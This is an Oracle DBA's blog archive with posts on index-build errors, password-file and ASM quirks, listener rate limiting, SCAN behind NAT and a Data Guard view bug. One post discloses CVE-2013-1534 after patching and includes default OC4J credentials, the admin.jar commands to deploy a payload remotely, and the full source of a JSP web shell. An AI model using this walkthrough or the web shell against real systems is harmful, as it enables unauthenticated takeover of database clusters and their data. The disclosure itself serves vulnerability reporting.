Archive for the ‘Oracle’ Category

ORA-14765: when CREATE INDEX ONLINE is not really online…

Friday, March 14th, 2014

Several days ago we hit an interesting (to me at least) Oracle error in our production application: “ORA-14765: Cannot create a partition while doing a create index”. It would not be strange if it had not happened during a CREATE INDEX ONLINE operation, which indicates that ONLINE index creation is not really an ONLINE operation (sic!).

Note1: you cannot test this in the SYS schema, as the deferred segment creation feature on partitioned tables does not seem to work for SYS (or the SYSTEM tablespace), which is dedicated to the Oracle dictionary only. This seems similar to the enhanced checksums always enabled for the SYSTEM tablespace (the hidden parameter _db_always_check_system_ts, which stands for “Always perform block check and checksum for System tablespace”) etc.

Note2: the key to getting the error is to have the parameter deferred_segment_creation set to TRUE, which is quite recommendable if you want to avoid wasting space, since starting with 11.2 Oracle allocates at minimum an 8MB initial extent per (sub)partition segment.
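A quick way to see where you stand is to inspect the parameter from any DBA session; a minimal sketch (the parameter name is real, and disabling it trades disk space for avoiding ORA-14765 on newly created tables):

```sql
show parameter deferred_segment_creation

-- affects only tables created after the change:
alter system set deferred_segment_creation = false scope=both;
```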

Note3: tested only on and

After a little playing here are the steps to reproduce it:

DBA1@test3> create table t1 (
    id number primary key,
    ts date,
    txt varchar2(64)
) partition by range (ts) interval (NUMTOYMINTERVAL(1, 'MONTH'))
( partition p1 values less than (TO_DATE('01.01.2000', 'DD.MM.YYYY')),
  partition p2000_02 values less than (TO_DATE('01.02.2000', 'DD.MM.YYYY')),
  partition p2000_03 values less than (TO_DATE('01.03.2000', 'DD.MM.YYYY')),
  partition p2000_04 values less than (TO_DATE('01.04.2000', 'DD.MM.YYYY')),
  partition p2000_05 values less than (TO_DATE('01.05.2000', 'DD.MM.YYYY')),
  partition p2000_06 values less than (TO_DATE('01.06.2000', 'DD.MM.YYYY')) );

Table created.

DBA1@test3> select table_name, segment_created from dba_tables where table_name='T1';

TABLE_NAME                     SEG
------------------------------ ---
T1                             N/A

DBA1@test3> select partition_name, segment_created from dba_tab_partitions where table_name='T1';

PARTITION_NAME                 SEGM
------------------------------ ----
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO

6 rows selected.


Now populate a single large current partition, which will take some time:

DBA1@test3> insert  /*+ APPEND NOLOGGING */ into t1 (id, ts, txt) SELECT level, sysdate, 'blah' FROM dual CONNECT BY LEVEL <= 2500000;

2500000 rows created.

DBA1@test3> commit;

Commit complete.


So far we have a partition with a segment size of approximately 73MB in the case of 8kB db blocks.

DBA1@test3> select p.partition_name, p.segment_created, s.bytes/1024 kb from dba_tab_partitions p left join dba_segments s on (p.partition_name=s.partition_name and p.table_name=s.segment_name) where p.table_name='T1' order by 2,1;

PARTITION_NAME                 SEGM         KB
------------------------------ ---- ----------
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO
SYS_P17066                     YES       73728

7 rows selected.

Now we start building the online local index in our 1st session using “create index t1_i1 on t1 (ts, txt) local online”, immediately followed by an attempt to insert a single row into one of the P2000_xx partitions (which have no initialized segments backing them at this point):

DBA1@test3> insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest');
insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest')
ERROR at line 1:
ORA-14765: Cannot create a partition while doing a create index


Summary: CREATE INDEX ONLINE is not fully compatible with sessions performing DML transactions against (sub)partitions that don’t come with pre-allocated segments. It seems very likely that Oracle transaction systems will run into ORA-14765, especially ones creating numerous automatically managed subpartitions based on some template (like interval range partitions that are subpartitioned by ID). Of course you may want to avoid deferred segment creation (and sacrifice a lot of storage space) or live with the risk of hitting those errors while building indexes (hopefully the application can just retry at a later stage).
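If retrying at the application level is acceptable, a hedged PL/SQL sketch of such a retry loop could look like this (it assumes execute privilege on DBMS_LOCK; the loop bound and sleep time are arbitrary):

```sql
declare
  e_ora14765 exception;
  pragma exception_init(e_ora14765, -14765);
begin
  for i in 1 .. 5 loop
    begin
      insert into t1 (id, ts, txt) values (3500001, sysdate, 'retry-test');
      commit;
      exit;  -- success, leave the loop
    exception
      when e_ora14765 then
        dbms_lock.sleep(10);  -- wait for the online index build to finish
    end;
  end loop;
end;
/
```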

A new, completely unsupported way of increasing ORAPWD entries

Friday, March 14th, 2014

FYI, I’ve just “invented” a completely new way of increasing the capacity of orapwd files online that does not require knowing the SYS password (this is needed once you hit ORA-1996 after trying to grant an additional SYSDBA). As you probably know, there is a hard limit on entries set when creating a new orapw file, and recreating it requires changing the SYS password. Apparently the following seems to work (TM), but don’t try this at home or on any production system:

[oracle@t10050 dbs]$ cp orapwdtest4  orapwdtest4.old # make backup
[oracle@t10050 dbs]$ ls -l orapwdtest4 # save the filesize in bytes as SIZE1
[oracle@t10050 dbs]$ orapwd file=/tmp/remove entries=20
Enter password for SYS: anything
[oracle@t10050 dbs]$ ls -l /tmp/remove # file size will be approx 3584 bytes on Linux x86_64; if you compare it to the default orapwd file, you will realize it is bigger by 2048 bytes
[oracle@t10050 dbs]$ dd if=/dev/zero of=/tmp/empty.2k bs=1k count=2
[oracle@t10050 dbs]$ cat /tmp/empty.2k >> orapwdtest4

Done! Brief tests show that it works and you can add more working SYSDBA accounts; removal works OK too, but again DO NOT TRY IT ON PRODUCTION as the internal orapwd structure is unknown to me ;)
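A quick way to verify that the extra slots actually work is to grant another SYSDBA and then list the password-file users (the account name below is just an example):

```sql
grant sysdba to some_dba;  -- hypothetical account

select username, sysdba, sysoper from v$pwfile_users;
```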

CVE-2013-1534: remote command execution on Oracle RAC (Grid Infrastructure >= 11.2.0.[23].0 till PSU/CPU Apr2013)

Thursday, January 23rd, 2014

In April 2013 Oracle fixed CVE-2013-1534, an attack that I’m going to describe here as the person who originally found it in February 2012 (it was a 0-day for more than a year). For official information please go here: Critical Patch Update April 2013. One thing I do not agree with Oracle on, though, is the score of 7.5. The statement goes like this: “For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.” Basically this is a remote attack that gains Oracle Grid Infrastructure owner privileges (basically “oracle”/”dba” in 99% of cases) on clustered (RAC) Oracle databases, which gives you read/write access to *all* data. Here I’m following responsible disclosure (vendor notified, fixed, clients alerted) … many, many months later I think all responsible people who care have already patched their Oracle RAC systems… for Patch Set this means it has been fixed via Grid Infrastructure + DB PSU (PatchSetUpdate) >= (current PSU is; for the recommended Oracle Alert docId is 1525152.1: Patch Set Update and Critical Patch Update April 2013 Availability Document).

Starting in release of Grid Infrastructure 11gR2 (technically Oracle added something like Quality of Service (QoS) for Databases, which in practice gives DBAs the ability to better balance resource usage between the nodes of a cluster in line with business requirements. SLAs are managed by the newly introduced QoS functionality by placing workloads on “server pools”. QoS in was not fully activated, but starting in Grid Infrastructure it is online by default, even without confirmation, etc. It is also activated by default on any upgrade.

The QoS on RAC/Grid Infrastructure is partially being implemented by embedded Oracle Containers for Java (OC4J).

The qosadmin account (always with the default password of “oracle112” per the Oracle documentation, on every install) always has the oc4j-administrators role assigned in /u01/app/11.2.0/grid/oc4j/j2ee/home/OC4J_DBWLM_config ($GRID_HOME/oc4j/j2ee/home/OC4J_DBWLM_config) in the file system-jazn-data.xml (JAZN stands for Java AuthoriZatioN). The same security configuration file is also used to control whether a username:password pair is authorized to deploy any J2EE application.

This means that OC4J is prone to arbitrary command execution on any Oracle clustered (RAC) database running at least on top of Oracle Clusterware (AKA Grid Infrastructure) >=, until the CPU (PSU) of April 2013 has been applied. This affects both customers using QoS and those not using it, because the OC4J service (serving an HTTP interface on port 8888) is always, by definition, enabled. The attack would by definition use the “qosadmin” account… The QoS for RAC documentation (which nobody reads, because it is a “new” feature and by definition nobody uses anything like this in production) states that the password for “qosadmin” should be changed because it may be used for QoS-related functionality. The remaining functionality seems to be disabled because it was never configured… but there’s more.

What’s more interesting is that there is a second account named “oc4jadmin” (a typical default OC4J admin); after brute-forcing, it also appears to be set to “oracle112”… on every installation out there… and you won’t find a single line in the official RAC documentation saying that this “backdoor” should be disabled. So in summary, every RAC >= on this planet has the same passwords set for uploading J2EE applications remotely over RMI (a Java thing). The oc4jadmin account is also assigned the oc4j-administrators role.

Some more details:
a) platform independent (100% success rate) exploitation vector
b) arbitrary command execution
c) gives UID of Oracle Grid Infrastructure software owner (typically “oracle” [1] or “grid” [2])
d) affects RAC >=, >=, has been tested on
[*] (linux x86_64),
[*] (linux x86_64),
[*] // CPU Jan2012
[*] // CPU Apr2012
[*] // CPU Jan2013
e) so by definition it will also work against flagship Oracle Exadata “Unbreakable” Database Machine ( as it utilizes Oracle RAC/Grid Infrastructure
f) this thing is remote
g) this thing does NOT require any sort of authentication (just plain TCP/IP connectivity to the servers is enough)
h) vulnerability is present in any installation of Oracle Grid Infrastructure >=
i) no social engineering is required at all
j) remote ports 23792 and 8888 need to be reachable on at least a single RAC node (the one running the RMI service)
k) it does NOT work against Oracle Restart (single server non-RAC Grid Infrastructure installation)

[1] – by being the “oracle” UNIX/Linux user one can connect “/ AS SYSDBA”, so it is a full compromise of data (including modification). Additionally, because the compromise gives shell access, it is very easy to also defeat Oracle Database Vault (an additional option for segregating DBAs from users – think in terms of MAC vs DAC [4]). If you are interested in defeating Oracle Databases with the Vault option, then I recommend the following link :)

[2] – when the new “Role Separation” feature introduced in 11gR2 [it separates ASM/Grid/Clusterware admins from DBAs] is deployed, which is very rare, it is still possible to get root; I’ll blog about it in the future. That’s probably why Oracle scored it CVSS 7.5, but the main point is that it is very rare to see the Grid Infrastructure owner separated from the Oracle RDBMS Home owner.

….ooooOOOO Exploitation Demonstration OOOOoooo…..

OC4J provides command-line utilities: admin.jar and admin_client.jar. You can use either of them, however I’ve only tested admin.jar (which of course is installed with any OC4J, and with RAC >= software too). Both JARs are actually just simple tools to upload a single EAR file and reconfigure the remote OC4J so that it starts serving requests for the uploaded application under a specific URL. We are going to upload cmd.ear :) The best documentation on them comes directly from Oracle e.g. here

The easiest way to get admin.jar (however, I’ve used the one coming with RAC) is to download it from the Oracle OC4J download page, as it contains the “OC4J Admin Client” (link , 3 disks, 1.4GB total). You probably need an admin.jar/admin_client.jar as close as possible to the version of the OC4J being attacked (e.g. using a 9.x.x admin.jar might fail uploading to RAC >= as the OC4J embedded there is at version 10.1.3, etc). I would recommend installing it on a RHEL/OL-compatible Linux distribution if possible (due to the enterprise nature of Oracle software). Alternatively, you could probably use a ready-to-run RAC VirtualMachine Linux template from Oracle (works for me under XEN). I’ve also tried the generic metasploit RMI uploaders (for JBoss, if I remember correctly) but failed (perhaps it’s possible, but IMHO there are easier ways).

Actually, only 2 commands and 1 click are needed to exploit this vulnerability. You do not need to write any tools/exploits, just execute several commands to upload cmd.ear onto the vulnerable RAC installation, thanks to the default passwords being deployed.

1. Deploy/upload the file (exploit) to the vulnerable RAC cluster

Detail: java -jar admin.jar ormi://<target>:23792 qosadmin oracle112  -deploy -file <path_cmd_exploit.ear> -deploymentName cmd


[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112  -deploy -file ~/cmd.ear -deploymentName cmd
Uploading file /root/cmd.ear to oc4j server side
[ 2012-06-08 08:14:39.290 EDT ] Application Deployer for cmd STARTS.
[ 2012-06-08 08:14:40.850 EDT ] Copy the archive to /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear
[ 2012-06-08 08:14:40.879 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear begins...
[ 2012-06-08 08:14:40.881 EDT ] Unpacking cmd.ear
[ 2012-06-08 08:14:40.887 EDT ] Done unpacking cmd.ear
[ 2012-06-08 08:14:40.895 EDT ] Unpacking cmd.war
[ 2012-06-08 08:14:40.905 EDT ] Done unpacking cmd.war
[ 2012-06-08 08:14:40.906 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear ends...
[ 2012-06-08 08:14:40.907 EDT ] Starting application : cmd
[ 2012-06-08 08:14:40.907 EDT ] Initializing ClassLoader(s)
[ 2012-06-08 08:14:40.908 EDT ] Initializing EJB container
[ 2012-06-08 08:14:40.909 EDT ] Loading connector(s)
[ 2012-06-08 08:14:40.921 EDT ] Starting up resource adapters
[ 2012-06-08 08:14:40.921 EDT ] Initializing EJB sessions
[ 2012-06-08 08:14:40.922 EDT ] Committing ClassLoader(s)
[ 2012-06-08 08:14:40.922 EDT ] Initialize cmd begins...
[ 2012-06-08 08:14:40.927 EDT ] Initialize cmd ends...
[ 2012-06-08 08:14:40.929 EDT ] Started application : cmd
[ 2012-06-08 08:14:40.932 EDT ] Application Deployer for cmd COMPLETES. Operation time: 1642 msecs

[root@attacker home]#

2. Now we bind the EAR (application/exploit) to a URL on the OC4J server
Once the J2EE (EAR) application has been deployed, you need to bind it to a visible URL:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112 -bindWebApp cmd cmd default-web-site /cmd
[root@attacker home]#

Basically you can specify qosadmin or oc4jadmin; as I stated earlier, it doesn’t matter.

3. Profit!
OK, first open a web browser and go to the URL http://target:8888/cmd/cmd.jsp?cmd=id+-a , where target is the hostname of one of the RAC nodes

Or, if you need a kick-ass web GUI interface to own someone: http://RACtarget:8888/cmd/


p.s. the cmd.jsp (and the EAR built from it – I’m not going to provide it) is very simple:

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" ACTION="cmd.jsp">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
        }
}
%>
</pre>
</BODY></HTML>

ASM diskgroup with negative disk sizes

Tuesday, January 7th, 2014

Sometimes as a DBA you will see strange signs on your way, like this one: an ASM +DATA diskgroup with no data and no files, yet something is taking up space (notice that Total_MB != Free_MB):

ASMCMD> lsdg
State    Type    Rebal  Sector  Block       AU  Total_MB  Free_MB  Req_mir_free_MB  Usable_file_MB  Offline_disks  Voting_files  Name
MOUNTED  EXTERN  N         512   4096  1048576   4095940  3271458                0         3271458              0             N  DATA/
MOUNTED  EXTERN  N         512   4096  1048576    102398   102304                0          102304              0             N  REDO/
MOUNTED  EXTERN  N         512   4096  1048576      1019      623                0             623              0             Y  SYSTEMDG/
ASMCMD> find +DATA *
ASMCMD> lsdsk

Rebalance won’t help, the ASM logs are clean, and so you are more and more confused. The situation is a little bit awkward, but one can spot a negative (!) capacity (close to -2^32) on some of the ASM disks that were recently added:

ASMCMD> lsdsk -k -G DATA
Total_MB      Free_MB   OS_MB  Name       Failgroup  Failgroup_Type  Library  Label  UDID  Product  Redund   Path
  409594       409037  409594  DATA_0000  DATA_0000  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_05
  409594       408885  409594  DATA_0001  DATA_0001  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_06
  409594       408895  409594  DATA_0002  DATA_0002  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_07
  409594       408680  409594  DATA_0003  DATA_0003  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_08
  409594       408987  409594  DATA_0004  DATA_0004  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_09
  409594       408931  409594  DATA_0005  DATA_0005  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_10
  409594       409079  409594  DATA_0006  DATA_0006  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_11
  409594       408964  409594  DATA_0007  DATA_0007  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_12
  409594  -4294555512  409594  DATA_0008  DATA_0008  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_13
  409594  -4294554748  409594  DATA_0009  DATA_0009  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_14

To fix the problem one can drop the affected ASM disks, remove the ASMLib labels, and – the critical part – reinitialize/overwrite with zeros (using dd from /dev/zero) a large chunk of the header on each individual LUN (at least 10MB), and afterwards re-add those disks (using ASMLib) to the diskgroup with the normal ALTER DISKGROUP +DG ADD DISK syntax. Afterwards you will see normal utilization in the diskgroup:
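The repair sequence above could be sketched as follows (device paths and disk/label names are placeholders; do not run this blindly against real LUNs):

```shell
# 1. as SYSASM: alter diskgroup DATA drop disk DATA_0008, DATA_0009;
# 2. remove the ASMLib label of the affected disk
oracleasm deletedisk DATA_13
# 3. zero at least 10MB of the LUN header (device path is a placeholder!)
dd if=/dev/zero of=/dev/mapper/lun_data_13 bs=1M count=10
# 4. re-create the ASMLib label
oracleasm createdisk DATA_13 /dev/mapper/lun_data_13
# 5. as SYSASM: alter diskgroup DATA add disk '/dev/oracleasm/disks/DATA_13';
```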

SQL> select name, state, type, total_mb, free_mb from v$asm_diskgroup;

NAME                           STATE       TYPE     TOTAL_MB    FREE_MB
------------------------------ ----------- ------ ---------- ----------
DATA                           MOUNTED     EXTERN    4095940    4090620
REDO                           MOUNTED     EXTERN     102398     102304
SYSTEMDG                       MOUNTED     EXTERN       1019        623


Reason: the LUN disks were probably not properly initialized (only 1MB had been overwritten), however no errors were reported during the first initialization. Another strange thing on a not-so-critical development system :)

Oracle Certified Master 11g

Tuesday, December 3rd, 2013


It is official now: I have successfully passed the Oracle Database 11g Administrator Certified Master Exam (at the age of 28, I should add). Preparing for it took a long time (years, since starting my career as an Oracle DBA), so there were almost no internals-like blog posts.

  • It’s one of the most advanced exams in IT for senior DBAs managing mission-critical 24×7 environments (the life-blood of any big IT system these days).
  • The best place for information on this exam is the OCM page itself, but you are only going to fully realize that after the exam.
  • The costs are insane (OCA and OCP as prerequisites + 3 Oracle University trainings [$$$] + the cost of the 2-day exam [$$]).
  • The tempo of the practical exam is insane too; there is no time left for thinking, you are literally doing stuff faster than you can think about it for 2 full days.
  • Mistakes cost a lot of time; it is all about skills and speed. If you have the skills, but won’t be able to perform some Exam Topic within a single skill-set time slot, do not even bother thinking about the exam itself.
  • You are not allowed to lose your data, and I think it is fair to say that if you lose the database (or database availability for too long) you are out of the exam. This is tested, but as I’m under NDA I will not go into details.

The stress caused by the number of tasks to be performed, plus the stress of doing something wrong (fear that you will damage your main production DB), plus the constant stress of something random failing during the exam (like hardware, or deliberate actions) creates a truly unique atmosphere during those 2 days… It is like 4 years of growth for an Oracle-based IT system compressed into 2 days, with all the obstacles and challenges.

RATE_LIMIT and Oracle RAC 11gR2?

Monday, November 4th, 2013

Oracle SQLNet/TNS connection rate limiting is an awesome way of increasing the stability of Oracle databases: it allows controlling the insane behavior of starting-up Application Servers or Middleware components that push hundreds of connections to the databases, killing CPU on the database/server side (and impacting other critical work). The way it works is also very important: it does not just refuse connections, but accept()s the socket without starting processing (it just queues the work). For more detail you can look at the official Oracle whitepaper, especially

The way it works is important, because rejecting the TCP connections (via TCP FIN or TCP RST) would cause the application to get “Unable to get connection”-type errors, which in most cases is not something you want. If this feature doesn’t work, you won’t be able to re-implement it in a different way – say, using Linux’s NetFilter – because there you can rate limit TCP connections primarily by dropping them.
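For contrast, a typical NetFilter “rate limit” can only drop the excess SYNs, so clients see connection errors instead of being queued (standard iptables syntax; the numbers are illustrative):

```shell
# accept at most ~10 new connections/second to the listener port,
# DROP the rest -- exactly the behavior RATE_LIMIT avoids
iptables -A INPUT -p tcp --dport 1521 --syn -m limit --limit 10/second -j ACCEPT
iptables -A INPUT -p tcp --dport 1521 --syn -j DROP
```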

You may be surprised to learn that, the official Oracle documentation notwithstanding, rate limiting Oracle SQLNet/TNS connections is NOT supported on RAC installations. The documentation itself is silent on this topic, but this has been confirmed with support via an Oracle SR. The probable primary reason is that in 11gR2 CRS manages the normal and SCAN listeners, so you have no way of altering the Oracle-managed listener.ora and endpoints_listener.ora files because they are overwritten by… but still the documentation asks you to edit them. Clearly a conflict here.
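For reference, this is roughly what the whitepaper asks you to put into listener.ora (parameter names as in the Oracle Net documentation, values illustrative) – and exactly the kind of manual edit that oraagent.bin will overwrite on RAC:

```
CONNECTION_RATE_LISTENER=10

LISTENER=
  (ADDRESS_LIST=
    (ADDRESS=(PROTOCOL=tcp)(HOST=racnode1-vip)(PORT=1521)(RATE_LIMIT=yes)))
```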

On RAC/CRS the listeners are supposed to be altered only via the “srvctl” command; srvctl is actually just a frontend, because since 11gR2 the oraagent.bin daemon takes care of monitoring and housekeeping the listeners. The problem is that srvctl does NOT have a way to enable RATE_LIMIT, and there is also no option to alter more advanced parameters like QUEUESIZE (fortunately on Linux 2.6.x the backlog depth for listen() seems to be SOMAXCONN=/proc/sys/net/core/somaxconn=128 by default), SDU, etc. (those are actually mentioned in Bug 11782958: “SRVCTL DOES NOT SUPPORT LISTENER CONFIGURATION LIKE MODIFYING QUEUESIZE, SEND/RE”, and also in DocID 1292915.1 “Setting Parameters for Scan and Node Listeners on RAC, Queuesize, SDU, Ports, etc”)

Sample srvctl options for 11gR2:

[oracle@racnode1 ~]$ aso srvctl config listener -a
Network: 1, Owner: oracle
Home: <CRS home>
  /u01/app/11.2.0/grid11203 on node(s) racnode1, racnode2
End points: TCP:1521
[oracle@racnode1 ~]$ aso srvctl modify listener -h

Modifies the configuration for the listener.

Usage: srvctl modify listener [-l <lsnr_name>] [-o <oracle_home>] [-p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"] [-u <oracle_user>] [-k <net_num>]
    -l <lsnr_name>           Listener name (default name is LISTENER)
    -o <oracle_home>         ORACLE_HOME path
    -p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"       Comma separated tcp ports or listener endpoints
    -u <oracle_user>         Oracle user
    -k <net_num>             network number (default number is 1)
    -h                       Print usage
[oracle@racnode1 ~]$

Additionally, Doc Id 1568591.1 “11gR2 Listener With RATE_LIMIT Set: Slow Connect Time and Tnsping Response Time High with TNS-1158 Error” mentions BUG:16409926 “LISTENER MEMORY LEAK IF RATE_LIMIT IS USED AND ENFORCED FREQUENTLY” (still not present in and PSUs, but fixed in and included from the start in ). Overall this feature doesn’t seem to be widely used and/or tested, and it doesn’t inspire confidence…

Oracle RAC SCAN is not compatible with NAT (and thus with PCI DSS)

Tuesday, August 6th, 2013

Oracle Single Client Access Name (SCAN) – a single access point name for Oracle RAC instance VIPs – often seems to be problematic in environments that use NAT or have to comply with regulations such as PCI DSS:

  1. section 1.3.3 – “Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment”
  2. section 1.3.8 – “Do not disclose private IP addresses and routing information to unauthorized parties. Note: Methods to obscure IP addressing may include, but are not limited to: Network Address Translation (NAT) [..]“

The problem with giving external/internal parties access to Oracle RAC database clusters can basically be defined as “Oracle SCAN incompatibility with Destination NAT/TCP proxies that act as network brokers”. Here’s a simple successful connection example to the TNS_ENTRY1 alias (served via a single 1xSCAN raccluster-scan VIP and the racnode1/racnode2 Oracle VIPs):

[someone@racnode1 ~]$ sqlplus doesnotexists@TNS_ENTRY1
[someone@racnode1 ~]$ grep -e nnftrne: -e niotns: -e nsc2addr: sqlnet_1696.trc
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:527] niotns: entry
(1002018528) [06-AUG-2013 09:58:30:527] niotns: niotns: setting up interrupt handler...
(1002018528) [06-AUG-2013 09:58:30:527] niotns: Not trying to enable dead connection detection.
(1002018528) [06-AUG-2013 09:58:30:528] niotns: Calling address: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=raccluster-scan)(PORT=1521))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone))))
(1002018528) [06-AUG-2013 09:58:30:529] nsc2addr: (DESCRIPTION=(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone)))(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.43)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:537] nsc2addr: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.42)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:572] niotns: niotns: passing ns handle back up...
(1002018528) [06-AUG-2013 09:58:30:572] niotns: exit
[someone@racnode1 ~]$

As you can see from the above example, the following is happening:
a) the client connects via TCP/1521 to raccluster-scan
b) the SCAN listener on raccluster-scan redirects – via TCP data – to the hostname of the least loaded Oracle VIP (!)
c) the client spawns a new connection directly to the Oracle VIP on TCP/1521 (!!)

The main problem is that when you have DNAT defined with a single TCP port redirection that looks like this: some Oracle client –TCP port 33333–> DNAT/proxy_redirection –> Oracle SCAN VIP, it is not going to work, because the Oracle SCAN listener will redirect “some Oracle client” to an Oracle VIP on TCP/1521. This will fail in 1 of 3 ways:

  1. failure scenario 1: the client might fail to resolve the VIP hostname using its own DNS
  2. failure scenario 2: the client might succeed in resolving the OracleVIPX hostname, but be unable to reach the private VIP address via IP routing, because the routers/default gateway won’t know how to route to the destination (e.g. the client is coming from a different organization, the internet, etc.)
  3. failure scenario 3: the client might succeed in DNS resolution and might even be able to route to the OracleVIPX IP, but there is a firewall somewhere in between (e.g. on the same box that is doing the DNAT/TCP proxying) blocking “some client” from reaching OracleVIPX directly on TCP/1521

There are several solutions to this problem:
1) don’t use the simple Oracle SCAN name, but provide a long TNS connection string with a number of NAT-ted/proxied TCP ports defined (every Oracle RAC node VIP should have its own NAT-ted/proxied TCP port for failover purposes – the Oracle client is responsible for load balancing and failing over Oracle connections)
- or -
2) implement some kind of highly available TCP proxy that intelligently routes Oracle traffic to healthy RAC instances (e.g. HAProxy, if you really have clients that support only short Oracle hostnames)
- or -
3) do tricks on the external-facing DNS name servers (or locally on clients, by placing entries in /etc/hosts) by spoofing the internal host names as the proxy ones, but you will need a 1:1 ratio of external to internal IPs to meet this goal (remember, each Oracle VIP serves connections on port 1521!)
- or -
4) THE SIMPLEST ONE: do not use NAT and allow direct traffic on the firewall, as NAT is evil :)
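A hedged sketch of option 1 – a client-side tnsnames.ora entry listing one NAT-ted external port per node VIP (hostnames and port numbers are illustrative only):

```
TNS_ENTRY1 =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (LOAD_BALANCE = on)
      (FAILOVER = on)
      (ADDRESS = (PROTOCOL = TCP)(HOST = proxy.example.com)(PORT = 33333))
      (ADDRESS = (PROTOCOL = TCP)(HOST = proxy.example.com)(PORT = 33334)))
    (CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = TNS_ENTRY1)))
```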


gv$dataguard_stats is buggy even on most recent PSUs

Tuesday, August 6th, 2013

Oracle introduced a new RAC-enabled view for Data Guard named gv$dataguard_stats, probably starting with 11.2. However, this view returns false information when queried on a RAC standby node where MRP0 is not running. Sample:

1st instance of standby RAC with MRP0 running:

SQL> select name,value from v$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18

SQL> select name,value from gv$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18
transport lag                  +00 00:00:00
apply lag                      +00 00:21:56
apply finish time              +00 00:00:41.526
estimated startup time         29

8 rows selected.


According to this gv$dataguard_stats output, the lag is 0s on the 1st node (itself) and 21 minutes on the 2nd (the time since MRP0 was relocated from the 2nd node to the 1st one) – this is wrong, because when you ask the 2nd RAC instance for its local view of the Data Guard apply lag you will see 0s.

SQL> select name,value from v$dataguard_stats;

NAME                             VALUE
-------------------------------- ------------------------------
transport lag                    +00 00:00:00
apply lag                        +00 00:00:00
apply finish time                +00 00:00:00.000
estimated startup time           29


This inconsistency was reported to Oracle in SR 3-6005743051: inconsistent gv$dataguard_stats on RAC standby. They did not register a bug (not even a documentation one) but returned the following clarification:

the rows “apply lag time”, “apply finish time” and “estimated startup time” are relevant only for the applying instance. You are allowed to send log files to several instances – in such a case “transport lag” is relevant for all receiving instances.

